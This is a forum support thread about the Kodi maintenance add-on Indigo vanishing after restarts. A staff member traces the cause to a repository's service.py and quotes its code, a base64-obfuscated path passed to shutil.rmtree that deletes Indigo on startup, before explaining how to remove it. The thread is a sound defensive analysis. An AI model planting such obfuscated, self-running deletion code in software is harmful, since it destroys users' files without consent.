Indigo keeps disappearing

freshair62

Feb 8, 2018
Ever since the CDATA fiasco I have had Kodi issues, I even switched boxes, I have always used Indigo as my go to HOUSEKEEPER, but is keeps going away, I reload it, run my maintenance program, Whats up with that or is there another app that i can replace it with.

freshair62

Feb 8, 2018
I have run the log and emailed it to myself address, It took awhile for me to figure this out but with perseverance I did it, Tell me my next step please, I am 75 yrs old so I am still learning, Thank You

accordv6

Sep 6, 2013
I try new Repo's all the time. Here is a list of ones I recently installed and it was after this that I noticed things stopped working properly

(Edit
Links Removed By Mod)

I hope this will help you in finding which repo could be causing the issue

Last edited by a moderator:

accordv6

Sep 6, 2013
Here is the list in jpeg form. the post above put in some links

(Edit
Link Removed By Mod)

Last edited by a moderator:

Dear Leader

Staff member
Apr 17, 2019
Tangier
www.tvaddons.co
@accordv6 Please send me the list by DM or email. I sent you a DM already.

Banister

Nov 3, 2013
Here's an interesting tidbit in "The Crew Repo > Program Addons:
Fu*k (spelled out) Indigo.

Summary is:
Force deletes Indigo on Kodi startup
Author: MuadDib
Version: 0.0.1

I don't have this thing installed, but I think it's safe to say this is the creep.

Banister

Nov 3, 2013
Forgot to add that the disclaimer on the add-on information states:

The author is not responsible for your addon. The author is also not responsible for breaking your stuff. You have been warned.

Banister

Nov 3, 2013
I uninstalled the repo and everything I could find yesterday. Didn't help because when I rebooted Indigo still disappeared. Where is the addon ID found?

Fusilier

May 13, 2018
The Crew Repo does not seem to be the problem Uninstalled it to no avail. It looks like Indigo is not completely uninstalled, but the "MENU ICONS" seems to disappear. If the main Indigo link is still visible, I can open the context menu and update the addon and it reinstalls the Indigo icons. The addon then works. But I have to do this every time I shut KODI down if I want to run INDIGO.

lance77tour

Nov 28, 2019
I've had the same issues for weeks now as well. I've even scrubbed everything on my pi3 B+'s many times to still have the same issue. Follow the same procedure install kodi, fusion installer, indigo, xbmc repo, meta-url-resolver. Then I begin to add zips/repos/plug-in's/etc. The fusion installer files install without a thumbnail image (just a black square), repo information under thumbnail in the run/config/update/depend/enable/unistall (says unknown). shut kodi down, restart opens up with the initial tvaddon screen, dismiss, run through config, run maintenance, restart and then it's gone and/or is still listed in programs or completely gone.

Shinzin

Staff member
Feb 16, 2017
Try Indigo now and see if the new update helps with this and let us know.

Banister

Nov 3, 2013
I still feel The Crew has something to do with this. Within seconds of reinstalling Indigo The Crew module updated itself. It was as if it was automatic and too coincidental for me to believe it was a random update. I rebooted and back to the same old same old with an Indigo error.

Shinzin

Staff member
Feb 16, 2017
Yes, they are one of the ones breaking your system.
They have a file called service.py in their repository thats only function is to remove Indigo.
They have the Indigo file path encoded with base64 to try to hide what they are doing.
Its very simple to decode base64, so I dont know why they think they are actually hiding anything. LOL
from their file service.py:
Code:
derka = 'Xc3BlY2lhbDovL2hvbWUvYWRkb25zL3BsdWdpbi5wcm9ncmFtLmluZGlnbw=='[1:].decode('base64')
derk = xbmc.translatePath((derka)).decode('utf-8')

shutil.rmtree(derk, ignore_errors=True)
Where the encoded line (derka) is: special://home/addons/plugin.program.indigo
then the line shutil.rmtree is the command that actually removes indigo

What you can do to stop them is to go to kodi/addons/repository.thecrew and just delete the service.py file thats in the folder.
You could also open the file (service.py) in any file editor, and just delete the line: shutil.rmtree(derk, ignore_errors=True)
The first two can be redone by them with an update to their repo,
The best way is to just disable and uninstall their repo and any and all addons they have.

Last edited:
Thread starter Similar threads Forum Replies Date
X Program Addons 1
X Indigo Tool 0
E Indigo Tool 4